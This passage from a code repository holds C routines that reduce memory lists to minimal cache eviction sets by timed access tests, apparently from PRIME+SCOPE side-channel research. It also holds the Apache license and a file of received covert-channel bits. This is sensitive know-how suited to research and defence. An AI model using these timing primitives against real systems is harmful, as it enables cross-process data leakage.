143 | #define ROUNDS 50
144 | #define MAX_BACKTRACK 50
145 | 
146 | int
147 | list_length(Elem *ptr)
148 | {
149 | 	int l = 0;
150 | 	while (ptr)
151 | 	{
152 | 		l = l + 1;
153 | 		ptr = ptr->next;
154 | 	}
155 | 	return l;
156 | }
157 | 
158 | void
159 | list_concat(Elem **ptr, Elem *chunk)
160 | {
161 | 	Elem *tmp = (ptr) ? *ptr : NULL;
162 | 	if (!tmp)
163 | 	{
164 | 		*ptr = chunk;
165 | 		return;
166 | 	}
167 | 	while (tmp->next != NULL)
168 | 	{
169 | 		tmp = tmp->next;
170 | 	}
171 | 	tmp->next = chunk;
172 | 	if (chunk)
173 | 	{
174 | 		chunk->prev = tmp;
175 | 	}
176 | }
177 | 
178 | void
179 | list_split(Elem *ptr, Elem **chunks, int n)
180 | {
181 | 	if (!ptr)
182 | 	{
183 | 		return;
184 | 	}
185 | 	int len = list_length (ptr), k = len / n, i = 0, j = 0;
186 | 	while (j < n)
187 | 	{
188 | 		i = 0;
189 | 		chunks[j] = ptr;
190 | 		if (ptr)
191 | 		{
192 | 			ptr->prev = NULL;
193 | 		}
194 | 		while (ptr != NULL && ((++i < k) || (j == n-1)))
195 | 		{
196 | 			ptr = ptr->next;
197 | 		}
198 | 		if (ptr)
199 | 		{
200 | 			ptr = ptr->next;
201 | 			if (ptr && ptr->prev) {
202 | 				ptr->prev->next = NULL;
203 | 			}
204 | 		}
205 | 		j++;
206 | 	}
207 | }
208 | 
209 | void
210 | list_from_chunks(Elem **ptr, Elem **chunks, int avoid, int len)
211 | {
212 | 	int next = (avoid + 1) % len;
213 | 	if (!(*ptr) || !chunks || !chunks[next])
214 | 	{
215 | 		return;
216 | 	}
217 | 	// Disconnect avoided chunk
218 | 	Elem *tmp = chunks[avoid];
219 | 	if (tmp) {
220 | 		tmp->prev = NULL;
221 | 	}
222 | 	while (tmp && tmp->next != NULL && tmp->next != chunks[next])
223 | 	{
224 | 		tmp = tmp->next;
225 | 	}
226 | 	if (tmp)
227 | 	{
228 | 		tmp->next = NULL;
229 | 	}
230 | 	// Link rest starting from next
231 | 	tmp = *ptr = chunks[next];
232 | 	if (tmp)
233 | 	{
234 | 		tmp->prev = NULL;
235 | 	}
236 | 	while (next != avoid && chunks[next] != NULL)
237 | 	{
238 | 		next = (next + 1) % len;
239 | 		while (tmp && tmp->next != NULL && tmp->next != chunks[next])
240 | 		{
241 | 			if (tmp->next)
242 | 			{
243 | 				tmp->next->prev = tmp;
244 | 			}
245 | 			tmp = tmp->next;
246 | 		}
247 | 		if (tmp)
248 | 		{
249 | 			tmp->next = chunks[next];
250 | 		}
251 | 		if (chunks[next])
252 | 		{
253 | 			chunks[next]->prev = tmp;
254 | 		}
255 | 	}
256 | 	if (tmp)
257 | 	{
258 | 		tmp->next = NULL;
259 | 	}
260 | }
261 | 
262 | void
263 | shuffle(int *array, size_t n)
264 | {
265 | 	size_t i;
266 | 	if (n > 1)
267 | 	{
268 | 		for (i = 0; i < n - 1; i++)
269 | 		{
270 | 			size_t j = i + rand() / (RAND_MAX / (n - i) + 1);
271 | 			int t = array[j];
272 | 			array[j] = array[i];
273 | 			array[i] = t;
274 | 		}
275 | 	}
276 | }
277 | 
278 | /*
279 |  * D012_S2 - Generated from PRIME+SCOPE/primetime
280 |  *
281 |  
282 |  void traverse_D012_S2(uint64_t* arr) {
283 |   int i;
284 |   for(i=0; i<13; i+=2) {
285 |     maccess((void *) arr[i+3]);
286 |     maccess((void *) arr[i+2]);
287 |     maccess((void *) arr[  0]);
288 |     maccess((void *) arr[i+1]);
289 |   }
290 | }
291 |  
292 |  */
293 | 
294 | void
295 | traverser(Elem *arg)
296 | {
297 | 	Elem *ptr = arg;
298 | 	while (ptr && ptr->next && ptr->next->next && ptr->next->next->next && ptr->next->next->next->next)
299 | 	{
300 | 		maccess((void *) ptr);
301 |                 maccess((void *) ptr->next);
302 |                 maccess((void *) ptr->next->next);
303 |                 maccess((void *) arg);
304 |                 maccess((void *) ptr->next->next->next);
305 |                 ptr = ptr->next->next->next->next;
306 | 
307 | 		/*
308 | 		memory_access (ptr->next->next->next);
309 | 		memory_access (ptr->next->next);
310 | 		memory_access (arg);
311 | 		memory_access (ptr->next);
312 | 		ptr = ptr->next->next;
313 | 		*/
314 | 	}
315 | }
316 | 
317 | int
318 | test_set(Elem *ptr, char *victim)
319 | {
320 |     // page walk
321 | 	memory_access (victim);
322 | 	memory_access (victim);
323 | 
324 | 	memory_fence();
325 | 	traverser(ptr);
326 | 	traverser(ptr);
327 | 	traverser(ptr);
328 |         
329 | 	return reload_time(victim);
330 | }
331 | 
332 | int
333 | tests_avg(Elem *ptr, char *victim, int rep)
334 | {
335 | 	int i = 0, ret =0;
336 | 	unsigned int delta = 0;
337 | 	unsigned int delta_d = 0;
338 | 	for (i=0; i < rep; i++)
339 | 	{
340 | 		delta = test_set (ptr, victim);
341 | 
342 |         	// remove noise
343 | 		if (delta < 800) {
344 | 			delta_d += delta;
345 | 		}
346 | 	}
347 | 	ret = (float)delta_d / rep;
348 | 	return ret > EVICTION_THRESHOLD;
349 | }
350 | 
351 | int
352 | gt_eviction(Elem **ptr, Elem **can, char *victim)
353 | {
354 | 	// Random chunk selection
355 | 	Elem **chunks = (Elem**) calloc (EVICTION_SET_SIZE + 1, sizeof (Elem*));
356 | 	if (!chunks)
357 | 	{
358 |         printf("Could not allocate chunks!\n");
359 | 		return 1;
360 | 	}
361 | 	int *ichunks = (int*) calloc (EVICTION_SET_SIZE + 1, sizeof (int)), i;
362 | 	if (!ichunks)
363 | 	{
364 | 		printf("Could not allocate ichunks!\n");
365 | 		free (chunks);
366 | 		return 1;
367 | 	}
368 | 
369 | 	int len = list_length(*ptr);
370 | 	int cans = 0;
371 | 
372 | 	// Calculate length: h = log(a/(a+1), a/n)
373 | 	double sz = (double)EVICTION_SET_SIZE / len;
374 | 	double rate = (double)EVICTION_SET_SIZE / (EVICTION_SET_SIZE + 1);
375 | 	int h = ceil(log(sz) / log(rate)), l = 0;
376 | 
377 | 	// Backtrack record
378 | 	Elem **back = (Elem**) calloc (h * 2, sizeof (Elem*));
379 | 	if (!back)
380 | 	{
381 | 		printf("Could not allocate back (%d, %f, %f, %d)!\n", h, sz, rate, list_length(*ptr));
382 | 		free (chunks);
383 | 		free (ichunks);
384 | 		return 1;
385 | 	}
386 | 
387 | 	int repeat = 0;
388 | 	do {
389 | 
390 | 		for (i=0; i < EVICTION_SET_SIZE + 1; i++)
391 | 		{
392 | 			ichunks[i] = i;
393 | 		}
394 | 		shuffle (ichunks, EVICTION_SET_SIZE + 1);
395 | 
396 | 		// Reduce
397 | 		while (len > EVICTION_SET_SIZE)
398 | 		{
399 | 
400 | 			list_split (*ptr, chunks, EVICTION_SET_SIZE + 1);
401 | 			int n = 0, ret = 0;
402 | 
403 | 			// Try paths
404 | 			do
405 | 			{
406 | 				list_from_chunks (ptr, chunks, ichunks[n], EVICTION_SET_SIZE + 1);
407 | 				n = n + 1;
408 | 				ret = tests_avg (*ptr, victim, ROUNDS);
409 | 			}
410 | 			while (!ret && (n < EVICTION_SET_SIZE + 1));
411 | 
412 | 			// If find smaller eviction set remove chunk
413 | 			if (ret && n <= EVICTION_SET_SIZE)
414 | 			{
415 | 				back[l] = chunks[ichunks[n-1]]; // store ptr to discarded chunk
416 | 				cans += list_length (back[l]); // add length of removed chunk
417 | 				len = list_length (*ptr);
418 | 				l = l + 1; // go to next lvl
419 | 			}
420 | 			// Else, re-add last removed chunk and try again
421 | 			else if (l > 0)
422 | 			{
423 | 				list_concat (ptr, chunks[ichunks[n-1]]); // recover last case
424 | 				l = l - 1;
425 | 				cans -= list_length (back[l]);
426 | 				list_concat (ptr, back[l]);
427 | 				back[l] = NULL;
428 | 				len = list_length (*ptr);
429 | 				goto mycont;
430 | 			}
431 | 			else
432 | 			{
433 | 				list_concat (ptr, chunks[ichunks[n-1]]); // recover last case
434 | 				break;
435 | 			}
436 | 		}
437 | 
438 | 		break;
439 | 		mycont:
440 | 		;
441 | 
442 | 	} while (l > 0 && repeat++ < MAX_BACKTRACK);
443 | 
444 | 	// recover discarded elements
445 | 	for (i = 0; i < h * 2; i++)
446 | 	{
447 | 		list_concat (can, back[i]);
448 | 	}
449 | 
450 | 	free (chunks);
451 | 	free (ichunks);
452 | 	free (back);
453 | 
454 |     int ret = 0;
455 |     
456 |     ret = tests_avg (*ptr, victim, ROUNDS);
457 |     
458 |     if (ret)
459 | 	{
460 | 		if (len > EVICTION_SET_SIZE)
461 | 		{
462 | 			return 1;
463 | 		}
464 | 	}
465 | 	else
466 | 	{
467 | 		return 1;
468 | 	}
469 | 
470 | 	return 0;
471 | }
472 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
  1 |                                  Apache License
  2 |                            Version 2.0, January 2004
  3 |                         http://www.apache.org/licenses/
  4 | 
  5 |    TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
  6 | 
  7 |    1. Definitions.
  8 | 
  9 |       "License" shall mean the terms and conditions for use, reproduction,
 10 |       and distribution as defined by Sections 1 through 9 of this document.
 11 | 
 12 |       "Licensor" shall mean the copyright owner or entity authorized by
 13 |       the copyright owner that is granting the License.
 14 | 
 15 |       "Legal Entity" shall mean the union of the acting entity and all
 16 |       other entities that control, are controlled by, or are under common
 17 |       control with that entity. For the purposes of this definition,
 18 |       "control" means (i) the power, direct or indirect, to cause the
 19 |       direction or management of such entity, whether by contract or
 20 |       otherwise, or (ii) ownership of fifty percent (50%) or more of the
 21 |       outstanding shares, or (iii) beneficial ownership of such entity.
 22 | 
 23 |       "You" (or "Your") shall mean an individual or Legal Entity
 24 |       exercising permissions granted by this License.
 25 | 
 26 |       "Source" form shall mean the preferred form for making modifications,
 27 |       including but not limited to software source code, documentation
 28 |       source, and configuration files.
 29 | 
 30 |       "Object" form shall mean any form resulting from mechanical
 31 |       transformation or translation of a Source form, including but
 32 |       not limited to compiled object code, generated documentation,
 33 |       and conversions to other media types.
 34 | 
 35 |       "Work" shall mean the work of authorship, whether in Source or
 36 |       Object form, made available under the License, as indicated by a
 37 |       copyright notice that is included in or attached to the work
 38 |       (an example is provided in the Appendix below).
 39 | 
 40 |       "Derivative Works" shall mean any work, whether in Source or Object
 41 |       form, that is based on (or derived from) the Work and for which the
 42 |       editorial revisions, annotations, elaborations, or other modifications
 43 |       represent, as a whole, an original work of authorship. For the purposes
 44 |       of this License, Derivative Works shall not include works that remain
 45 |       separable from, or merely link (or bind by name) to the interfaces of,
 46 |       the Work and Derivative Works thereof.
 47 | 
 48 |       "Contribution" shall mean any work of authorship, including
 49 |       the original version of the Work and any modifications or additions
 50 |       to that Work or Derivative Works thereof, that is intentionally
 51 |       submitted to Licensor for inclusion in the Work by the copyright owner
 52 |       or by an individual or Legal Entity authorized to submit on behalf of
 53 |       the copyright owner. For the purposes of this definition, "submitted"
 54 |       means any form of electronic, verbal, or written communication sent
 55 |       to the Licensor or its representatives, including but not limited to
 56 |       communication on electronic mailing lists, source code control systems,
 57 |       and issue tracking systems that are managed by, or on behalf of, the
 58 |       Licensor for the purpose of discussing and improving the Work, but
 59 |       excluding communication that is conspicuously marked or otherwise
 60 |       designated in writing by the copyright owner as "Not a Contribution."
 61 | 
 62 |       "Contributor" shall mean Licensor and any individual or Legal Entity
 63 |       on behalf of whom a Contribution has been received by Licensor and
 64 |       subsequently incorporated within the Work.
 65 | 
 66 |    2. Grant of Copyright License. Subject to the terms and conditions of
 67 |       this License, each Contributor hereby grants to You a perpetual,
 68 |       worldwide, non-exclusive, no-charge, royalty-free, irrevocable
 69 |       copyright license to reproduce, prepare Derivative Works of,
 70 |       publicly display, publicly perform, sublicense, and distribute the
 71 |       Work and such Derivative Works in Source or Object form.
 72 | 
 73 |    3. Grant of Patent License. Subject to the terms and conditions of
 74 |       this License, each Contributor hereby grants to You a perpetual,
 75 |       worldwide, non-exclusive, no-charge, royalty-free, irrevocable
 76 |       (except as stated in this section) patent license to make, have made,
 77 |       use, offer to sell, sell, import, and otherwise transfer the Work,
 78 |       where such license applies only to those patent claims licensable
 79 |       by such Contributor that are necessarily infringed by their
 80 |       Contribution(s) alone or by combination of their Contribution(s)
 81 |       with the Work to which such Contribution(s) was submitted. If You
 82 |       institute patent litigation against any entity (including a
 83 |       cross-claim or counterclaim in a lawsuit) alleging that the Work
 84 |       or a Contribution incorporated within the Work constitutes direct
 85 |       or contributory patent infringement, then any patent licenses
 86 |       granted to You under this License for that Work shall terminate
 87 |       as of the date such litigation is filed.
 88 | 
 89 |    4. Redistribution. You may reproduce and distribute copies of the
 90 |       Work or Derivative Works thereof in any medium, with or without
 91 |       modifications, and in Source or Object form, provided that You
 92 |       meet the following conditions:
 93 | 
 94 |       (a) You must give any other recipients of the Work or
 95 |           Derivative Works a copy of this License; and
 96 | 
 97 |       (b) You must cause any modified files to carry prominent notices
 98 |           stating that You changed the files; and
 99 | 
100 |       (c) You must retain, in the Source form of any Derivative Works
101 |           that You distribute, all copyright, patent, trademark, and
102 |           attribution notices from the Source form of the Work,
103 |           excluding those notices that do not pertain to any part of
104 |           the Derivative Works; and
105 | 
106 |       (d) If the Work includes a "NOTICE" text file as part of its
107 |           distribution, then any Derivative Works that You distribute must
108 |           include a readable copy of the attribution notices contained
109 |           within such NOTICE file, excluding those notices that do not
110 |           pertain to any part of the Derivative Works, in at least one
111 |           of the following places: within a NOTICE text file distributed
112 |           as part of the Derivative Works; within the Source form or
113 |           documentation, if provided along with the Derivative Works; or,
114 |           within a display generated by the Derivative Works, if and
115 |           wherever such third-party notices normally appear. The contents
116 |           of the NOTICE file are for informational purposes only and
117 |           do not modify the License. You may add Your own attribution
118 |           notices within Derivative Works that You distribute, alongside
119 |           or as an addendum to the NOTICE text from the Work, provided
120 |           that such additional attribution notices cannot be construed
121 |           as modifying the License.
122 | 
123 |       You may add Your own copyright statement to Your modifications and
124 |       may provide additional or different license terms and conditions
125 |       for use, reproduction, or distribution of Your modifications, or
126 |       for any such Derivative Works as a whole, provided Your use,
127 |       reproduction, and distribution of the Work otherwise complies with
128 |       the conditions stated in this License.
129 | 
130 |    5. Submission of Contributions. Unless You explicitly state otherwise,
131 |       any Contribution intentionally submitted for inclusion in the Work
132 |       by You to the Licensor shall be under the terms and conditions of
133 |       this License, without any additional terms or conditions.
134 |       Notwithstanding the above, nothing herein shall supersede or modify
135 |       the terms of any separate license agreement you may have executed
136 |       with Licensor regarding such Contributions.
137 | 
138 |    6. Trademarks. This License does not grant permission to use the trade
139 |       names, trademarks, service marks, or product names of the Licensor,
140 |       except as required for reasonable and customary use in describing the
141 |       origin of the Work and reproducing the content of the NOTICE file.
142 | 
143 |    7. Disclaimer of Warranty. Unless required by applicable law or
144 |       agreed to in writing, Licensor provides the Work (and each
145 |       Contributor provides its Contributions) on an "AS IS" BASIS,
146 |       WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 |       implied, including, without limitation, any warranties or conditions
148 |       of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 |       PARTICULAR PURPOSE. You are solely responsible for determining the
150 |       appropriateness of using or redistributing the Work and assume any
151 |       risks associated with Your exercise of permissions under this License.
152 | 
153 |    8. Limitation of Liability. In no event and under no legal theory,
154 |       whether in tort (including negligence), contract, or otherwise,
155 |       unless required by applicable law (such as deliberate and grossly
156 |       negligent acts) or agreed to in writing, shall any Contributor be
157 |       liable to You for damages, including any direct, indirect, special,
158 |       incidental, or consequential damages of any character arising as a
159 |       result of this License or out of the use or inability to use the
160 |       Work (including but not limited to damages for loss of goodwill,
161 |       work stoppage, computer failure or malfunction, or any and all
162 |       other commercial damages or losses), even if such Contributor
163 |       has been advised of the possibility of such damages.
164 | 
165 |    9. Accepting Warranty or Additional Liability. While redistributing
166 |       the Work or Derivative Works thereof, You may choose to offer,
167 |       and charge a fee for, acceptance of support, warranty, indemnity,
168 |       or other liability obligations and/or rights consistent with this
169 |       License. However, in accepting such obligations, You may act only
170 |       on Your own behalf and on Your sole responsibility, not on behalf
171 |       of any other Contributor, and only if You agree to indemnify,
172 |       defend, and hold each Contributor harmless for any liability
173 |       incurred by, or claims asserted against, such Contributor by reason
174 |       of your accepting any such warranty or additional liability.
175 | 
176 |    END OF TERMS AND CONDITIONS
177 | 
178 |    APPENDIX: How to apply the Apache License to your work.
179 | 
180 |       To apply the Apache License to your work, attach the following
181 |       boilerplate notice, with the fields enclosed by brackets "[]"
182 |       replaced with your own identifying information. (Don't include
183 |       the brackets!)  The text should be enclosed in the appropriate
184 |       comment syntax for the file format. We also recommend that a
185 |       file or class name and description of purpose be included on the
186 |       same "printed page" as the copyright notice for easier
187 |       identification within third-party archives.
188 | 
189 |    Copyright [yyyy] [name of copyright owner]
190 | 
191 |    Licensed under the Apache License, Version 2.0 (the "License");
192 |    you may not use this file except in compliance with the License.
193 |    You may obtain a copy of the License at
194 | 
195 |        http://www.apache.org/licenses/LICENSE-2.0
196 | 
197 |    Unless required by applicable law or agreed to in writing, software
198 |    distributed under the License is distributed on an "AS IS" BASIS,
199 |    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 |    See the License for the specific language governing permissions and
201 |    limitations under the License.
202 | 


--------------------------------------------------------------------------------
/covert_channel_eval/recv.txt:
--------------------------------------------------------------------------------
   1 | 0
   2 | 0
   3 | 0
   4 | 0
   5 | 0
   6 | 0
   7 | 1
   8 | 1
   9 | 1
  10 | 1
  11 | 1
  12 | 1
  13 | 1
  14 | 1
  15 | 1
  16 | 1
  17 | 1
  18 | 1
  19 | 1
  20 | 1
  21 | 1
  22 | 1
  23 | 0
  24 | 0
  25 | 0
  26 | 0
  27 | 0
  28 | 0
  29 | 0
  30 | 1
  31 | 1
  32 | 1
  33 | 1
  34 | 1
  35 | 1
  36 | 1
  37 | 1
  38 | 0
  39 | 0
  40 | 0
  41 | 1
  42 | 1
  43 | 1
  44 | 1
  45 | 1
  46 | 1
  47 | 1
  48 | 1
  49 | 1
  50 | 1
  51 | 1
  52 | 1
  53 | 1
  54 | 1
  55 | 1
  56 | 1
  57 | 0
  58 | 0
  59 | 0
  60 | 1
  61 | 1
  62 | 1
  63 | 1
  64 | 1
  65 | 1
  66 | 1
  67 | 1
  68 | 0
  69 | 0
  70 | 0
  71 | 0
  72 | 0
  73 | 0
  74 | 0
  75 | 1
  76 | 1
  77 | 1
  78 | 1
  79 | 1
  80 | 1
  81 | 1
  82 | 1
  83 | 1
  84 | 1
  85 | 1
  86 | 1
  87 | 1
  88 | 1
  89 | 1
  90 | 0
  91 | 0
  92 | 0
  93 | 0
  94 | 0
  95 | 0
  96 | 0
  97 | 1
  98 | 1
  99 | 1
 100 | 1
 101 | 1
 102 | 1
 103 | 1
 104 | 1
 105 | 1
 106 | 1
 107 | 1
 108 | 1
 109 | 1
 110 | 1
 111 | 1
 112 | 1
 113 | 0
 114 | 0
 115 | 0
 116 | 0
 117 | 0
 118 | 0
 119 | 0
 120 | 1
 121 | 1
 122 | 1
 123 | 1
 124 | 1
 125 | 1
 126 | 1
 127 | 1
 128 | 0
 129 | 0
 130 | 0
 131 | 1
 132 | 1
 133 | 1
 134 | 1
 135 | 1
 136 | 1
 137 | 1
 138 | 1
 139 | 1
 140 | 1
 141 | 1
 142 | 1
 143 | 1
 144 | 1
 145 | 1
 146 | 1
 147 | 0
 148 | 0
 149 | 0
 150 | 1
 151 | 1
 152 | 1
 153 | 1
 154 | 1
 155 | 1
 156 | 1
 157 | 1
 158 | 0
 159 | 0
 160 | 0
 161 | 0
 162 | 0
 163 | 0
 164 | 0
 165 | 1
 166 | 1
 167 | 1
 168 | 1
 169 | 1
 170 | 1
 171 | 1
 172 | 1
 173 | 1
 174 | 1
 175 | 1
 176 | 1
 177 | 1
 178 | 1
 179 | 1
 180 | 0
 181 | 0
 182 | 0
 183 | 0
 184 | 0
 185 | 0
 186 | 0
 187 | 1
 188 | 1
 189 | 1
 190 | 1
 191 | 1
 192 | 1
 193 | 1
 194 | 1
 195 | 1
 196 | 1
 197 | 1
 198 | 1
 199 | 1
 200 | 1
 201 | 1
 202 | 1
 203 | 0
 204 | 0
 205 | 0
 206 | 0
 207 | 0
 208 | 0
 209 | 0
 210 | 1
 211 | 1
 212 | 1
 213 | 1
 214 | 1
 215 | 1
 216 | 1
 217 | 1
 218 | 0
 219 | 0
 220 | 0
 221 | 1
 222 | 1
 223 | 1
 224 | 1
 225 | 1
 226 | 1
 227 | 1
 228 | 1
 229 | 1
 230 | 1
 231 | 1
 232 | 1
 233 | 1
 234 | 1
 235 | 1
 236 | 1
 237 | 0
 238 | 0
 239 | 0
 240 | 1
 241 | 1
 242 | 1
 243 | 1
 244 | 1
 245 | 1
 246 | 1
 247 | 1
 248 | 0
 249 | 0
 250 | 0
 251 | 0
 252 | 0
 253 | 0
 254 | 0
 255 | 1
 256 | 1
 257 | 1
 258 | 1
 259 | 1
 260 | 1
 261 | 1
 262 | 1
 263 | 1
 264 | 1
 265 | 1
 266 | 1
 267 | 1
 268 | 1
 269 | 1
 270 | 0
 271 | 0
 272 | 0
 273 | 0
 274 | 0
 275 | 0
 276 | 0
 277 | 1
 278 | 1
 279 | 1
 280 | 1
 281 | 1
 282 | 1
 283 | 1
 284 | 1
 285 | 1
 286 | 1
 287 | 1
 288 | 1
 289 | 1
 290 | 1
 291 | 1
 292 | 1
 293 | 0
 294 | 0
 295 | 0
 296 | 0
 297 | 0
 298 | 0
 299 | 1
 300 | 1
 301 | 1
 302 | 1
 303 | 1
 304 | 1
 305 | 1
 306 | 1
 307 | 0
 308 | 0
 309 | 0
 310 | 0
 311 | 1
 312 | 1
 313 | 1
 314 | 1
 315 | 1
 316 | 1
 317 | 1
 318 | 1
 319 | 1
 320 | 1
 321 | 1
 322 | 1
 323 | 1
 324 | 1
 325 | 1
 326 | 0
 327 | 0
 328 | 0
 329 | 0
 330 | 1
 331 | 1
 332 | 1
 333 | 1
 334 | 1
 335 | 1
 336 | 1
 337 | 0
 338 | 0
 339 | 0
 340 | 0
 341 | 0
 342 | 0
 343 | 0
 344 | 1
 345 | 1
 346 | 1
 347 | 1
 348 | 1
 349 | 1
 350 | 1
 351 | 1
 352 | 1
 353 | 1
 354 | 1
 355 | 1
 356 | 1
 357 | 1
 358 | 1
 359 | 1
 360 | 0
 361 | 0
 362 | 0
 363 | 0
 364 | 0
 365 | 0
 366 | 0
 367 | 1
 368 | 1
 369 | 1
 370 | 1
 371 | 1
 372 | 1
 373 | 1
 374 | 1
 375 | 1
 376 | 1
 377 | 1
 378 | 1
 379 | 1
 380 | 1
 381 | 1
 382 | 0
 383 | 0
 384 | 0
 385 | 0
 386 | 0
 387 | 0
 388 | 0
 389 | 1
 390 | 1
 391 | 1
 392 | 1
 393 | 1
 394 | 1
 395 | 1
 396 | 1
 397 | 0
 398 | 0
 399 | 0
 400 | 1
 401 | 1
 402 | 1
 403 | 1
 404 | 1
 405 | 1
 406 | 1
 407 | 1
 408 | 1
 409 | 1
 410 | 1
 411 | 1
 412 | 1
 413 | 1
 414 | 1
 415 | 1
 416 | 0
 417 | 0
 418 | 0
 419 | 1
 420 | 1
 421 | 1
 422 | 1
 423 | 1
 424 | 1
 425 | 1
 426 | 1
 427 | 0
 428 | 0
 429 | 0
 430 | 0
 431 | 0
 432 | 0
 433 | 0
 434 | 1
 435 | 1
 436 | 1
 437 | 1
 438 | 1
 439 | 1
 440 | 1
 441 | 1
 442 | 1
 443 | 1
 444 | 1
 445 | 1
 446 | 1
 447 | 1
 448 | 1
 449 | 0
 450 | 0
 451 | 0
 452 | 0
 453 | 0
 454 | 0
 455 | 0
 456 | 1
 457 | 1
 458 | 1
 459 | 1
 460 | 1
 461 | 1
 462 | 1
 463 | 1
 464 | 1
 465 | 1
 466 | 1
 467 | 1
 468 | 1
 469 | 1
 470 | 1
 471 | 1
 472 | 0
 473 | 0
 474 | 0
 475 | 0
 476 | 0
 477 | 0
 478 | 0
 479 | 1
 480 | 1
 481 | 1
 482 | 1
 483 | 1
 484 | 1
 485 | 1
 486 | 1
 487 | 0
 488 | 0
 489 | 0
 490 | 1
 491 | 1
 492 | 1
 493 | 1
 494 | 1
 495 | 1
 496 | 1
 497 | 1
 498 | 1
 499 | 1
 500 | 1
 501 | 1
 502 | 1
 503 | 1
 504 | 1
 505 | 1
 506 | 0
 507 | 0
 508 | 0
 509 | 1
 510 | 1
 511 | 1
 512 | 1
 513 | 1
 514 | 1
 515 | 1
 516 | 0
 517 | 0
 518 | 0
 519 | 0
 520 | 0
 521 | 0
 522 | 0
 523 | 1
 524 | 1
 525 | 1
 526 | 1
 527 | 1
 528 | 1
 529 | 1
 530 | 1
 531 | 1
 532 | 1
 533 | 1
 534 | 1
 535 | 1
 536 | 1
 537 | 1
 538 | 1
 539 | 0
 540 | 0
 541 | 0
 542 | 0
 543 | 0
 544 | 0
 545 | 0
 546 | 1
 547 | 1
 548 | 1
 549 | 1
 550 | 1
 551 | 1
 552 | 1
 553 | 1
 554 | 1
 555 | 1
 556 | 1
 557 | 1
 558 | 1
 559 | 1
 560 | 1
 561 | 0
 562 | 0
 563 | 0
 564 | 0
 565 | 0
 566 | 0
 567 | 0
 568 | 1
 569 | 1
 570 | 1
 571 | 1
 572 | 1
 573 | 1
 574 | 1
 575 | 0
 576 | 0
 577 | 0
 578 | 0
 579 | 1
 580 | 1
 581 | 1
 582 | 1
 583 | 1
 584 | 1
 585 | 1
 586 | 1
 587 | 1
 588 | 1
 589 | 1
 590 | 1
 591 | 1
 592 | 1
 593 | 1
 594 | 0
 595 | 0
 596 | 0
 597 | 0
 598 | 1
 599 | 1
 600 | 1
 601 | 1
 602 | 1
 603 | 1
 604 | 1
 605 | 0
 606 | 0
 607 | 0
 608 | 0
 609 | 0
 610 | 0
 611 | 0
 612 | 1
 613 | 1
 614 | 1
 615 | 1
 616 | 1
 617 | 1
 618 | 1
 619 | 1
 620 | 1
 621 | 1
 622 | 1
 623 | 1
 624 | 1
 625 | 1
 626 | 1
 627 | 1
 628 | 0
 629 | 0
 630 | 0
 631 | 0
 632 | 0
 633 | 0
 634 | 1
 635 | 1
 636 | 1
 637 | 1
 638 | 1
 639 | 1
 640 | 1
 641 | 1
 642 | 1
 643 | 1
 644 | 1
 645 | 1
 646 | 1
 647 | 1
 648 | 1
 649 | 1
 650 | 0
 651 | 0
 652 | 0
 653 | 0
 654 | 0
 655 | 0
 656 | 0
 657 | 1
 658 | 1
 659 | 1
 660 | 1
 661 | 1
 662 | 1
 663 | 1
 664 | 1
 665 | 0
 666 | 0
 667 | 0
 668 | 1
 669 | 1
 670 | 1
 671 | 1
 672 | 1
 673 | 1
 674 | 1
 675 | 1
 676 | 1
 677 | 1
 678 | 1
 679 | 1
 680 | 1
 681 | 1
 682 | 1
 683 | 1
 684 | 0
 685 | 0
 686 | 0
 687 | 1
 688 | 1
 689 | 1
 690 | 1
 691 | 1
 692 | 1
 693 | 1
 694 | 1
 695 | 0
 696 | 0
 697 | 0
 698 | 0
 699 | 0
 700 | 0
 701 | 0
 702 | 1
 703 | 1
 704 | 1
 705 | 1
 706 | 1
 707 | 1
 708 | 1
 709 | 1
 710 | 1
 711 | 1
 712 | 1
 713 | 1
 714 | 1
 715 | 1
 716 | 1
 717 | 0
 718 | 0
 719 | 0
 720 | 0
 721 | 0
 722 | 0
 723 | 0
 724 | 1
 725 | 1
 726 | 1
 727 | 1
 728 | 1
 729 | 1
 730 | 1
 731 | 1
 732 | 1
 733 | 1
 734 | 1
 735 | 1
 736 | 1
 737 | 1
 738 | 1
 739 | 1
 740 | 0
 741 | 0
 742 | 0
 743 | 0
 744 | 0
 745 | 0
 746 | 0
 747 | 1
 748 | 1
 749 | 1
 750 | 1
 751 | 1
 752 | 1
 753 | 1
 754 | 1
 755 | 0
 756 | 0
 757 | 0
 758 | 1
 759 | 1
 760 | 1
 761 | 1
 762 | 1
 763 | 1
 764 | 1
 765 | 1
 766 | 1
 767 | 1
 768 | 1
 769 | 1
 770 | 1
 771 | 1
 772 | 1
 773 | 1
 774 | 0
 775 | 0
 776 | 0
 777 | 1
 778 | 1
 779 | 1
 780 | 1
 781 | 1
 782 | 1
 783 | 1
 784 | 1
 785 | 0
 786 | 0
 787 | 0
 788 | 0
 789 | 0
 790 | 0
 791 | 0
 792 | 1
 793 | 1
 794 | 1
 795 | 1
 796 | 1
 797 | 1
 798 | 1
 799 | 1
 800 | 1
 801 | 1
 802 | 1
 803 | 1
 804 | 1
 805 | 1
 806 | 1
 807 | 0
 808 | 0
 809 | 0
 810 | 0
 811 | 0
 812 | 0
 813 | 0
 814 | 1
 815 | 1
 816 | 1
 817 | 1
 818 | 1
 819 | 1
 820 | 1
 821 | 1
 822 | 1
 823 | 1
 824 | 1
 825 | 1
 826 | 1
 827 | 1
 828 | 1
 829 | 0
 830 | 0
 831 | 0
 832 | 0
 833 | 0
 834 | 0
 835 | 0
 836 | 1
 837 | 1
 838 | 1
 839 | 1
 840 | 1
 841 | 1
 842 | 1
 843 | 1
 844 | 0
 845 | 0
 846 | 0
 847 | 1
 848 | 1
 849 | 1
 850 | 1
 851 | 1
 852 | 1
 853 | 1
 854 | 1
 855 | 1
 856 | 1
 857 | 1
 858 | 1
 859 | 1
 860 | 1
 861 | 1
 862 | 1
 863 | 0
 864 | 0
 865 | 0
 866 | 1
 867 | 1
 868 | 1
 869 | 1
 870 | 1
 871 | 1
 872 | 1
 873 | 1
 874 | 0
 875 | 0
 876 | 0
 877 | 0
 878 | 0
 879 | 0
 880 | 0
 881 | 1
 882 | 1
 883 | 1
 884 | 1
 885 | 1
 886 | 1
 887 | 1
 888 | 1
 889 | 1
 890 | 1
 891 | 1
 892 | 1
